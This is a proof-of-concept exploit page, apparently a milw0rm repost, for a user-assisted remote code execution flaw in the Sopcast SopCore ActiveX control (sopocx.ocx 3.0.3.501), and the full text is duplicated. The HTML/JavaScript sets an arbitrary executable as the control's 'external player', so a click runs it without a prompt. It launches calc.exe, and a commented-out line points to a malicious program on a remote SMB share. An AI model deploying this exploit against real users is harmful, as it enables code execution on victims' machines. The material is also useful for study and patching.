-- Sopcast SopCore Control (sopocx.ocx 3.0.3.501) SetExternalPlayer()
user assisted remote code execution poc
by Nine:Situations:Group::surfista (IE7/8)
our site: http://retrogod.altervista.org/
software site: http://www.sopcast.org/
Through the SetExternalPlayer() method and the ExternalPlayer property is possible to associate an arbitrary executable to the "external player" button (for clearness see http://www.sopcast.com/docs/ where the player control buttons are showed) which opens Windows Media Player by default. When the user click this button, the executable is launched without prompts Also this value is stored in config.xml, inside the sopcast local folder for further use, ex. with the sopcast client application Note: this control is safe for scripting and safe for initialization
--
HTML
HEAD
script language="Javascript" type="text/JavaScript"
window.onload=function()
{
SopPlayer.InitPlayer();
//SopPlayer.SetExternalPlayer("\\\\192.168.0.1\\c$\\PATH\\TO\\MALICIOUS_PROGRAM.EXE");
SopPlayer.SetExternalPlayer("c:\\WINDOWS\\system32\\calc.exe");
SopPlayer.SetSopAddress("sop://broker.sopcast.com:3912/6002"); //A LIVE CHANNEL ...
SopPlayer.SetChannelName("CCTV5");
SopPlayer.Play();
}
/script
/HEAD
BODY
OBJECT
ID="SopPlayer"
name="SopPlayer"
CLASSID=clsid:8FEFF364-6A5F-4966-A917-A3AC28411659
HEIGHT=375
WIDTH=375
/OBJECT
/BODY
/HTML
# milw0rm
user assisted remote code execution poc
by Nine:Situations:Group::surfista (IE7/8)
our site: http://retrogod.altervista.org/
software site: http://www.sopcast.org/
Through the SetExternalPlayer() method and the ExternalPlayer property is possible to associate an arbitrary executable to the "external player" button (for clearness see http://www.sopcast.com/docs/ where the player control buttons are showed) which opens Windows Media Player by default. When the user click this button, the executable is launched without prompts Also this value is stored in config.xml, inside the sopcast local folder for further use, ex. with the sopcast client application Note: this control is safe for scripting and safe for initialization
--
HTML
HEAD
script language="Javascript" type="text/JavaScript"
window.onload=function()
{
SopPlayer.InitPlayer();
//SopPlayer.SetExternalPlayer("\\\\192.168.0.1\\c$\\PATH\\TO\\MALICIOUS_PROGRAM.EXE");
SopPlayer.SetExternalPlayer("c:\\WINDOWS\\system32\\calc.exe");
SopPlayer.SetSopAddress("sop://broker.sopcast.com:3912/6002"); //A LIVE CHANNEL ...
SopPlayer.SetChannelName("CCTV5");
SopPlayer.Play();
}
/script
/HEAD
BODY
OBJECT
ID="SopPlayer"
name="SopPlayer"
CLASSID=clsid:8FEFF364-6A5F-4966-A917-A3AC28411659
HEIGHT=375
WIDTH=375
/OBJECT
/BODY
/HTML
# milw0rm
Posts
No comments:
Post a Comment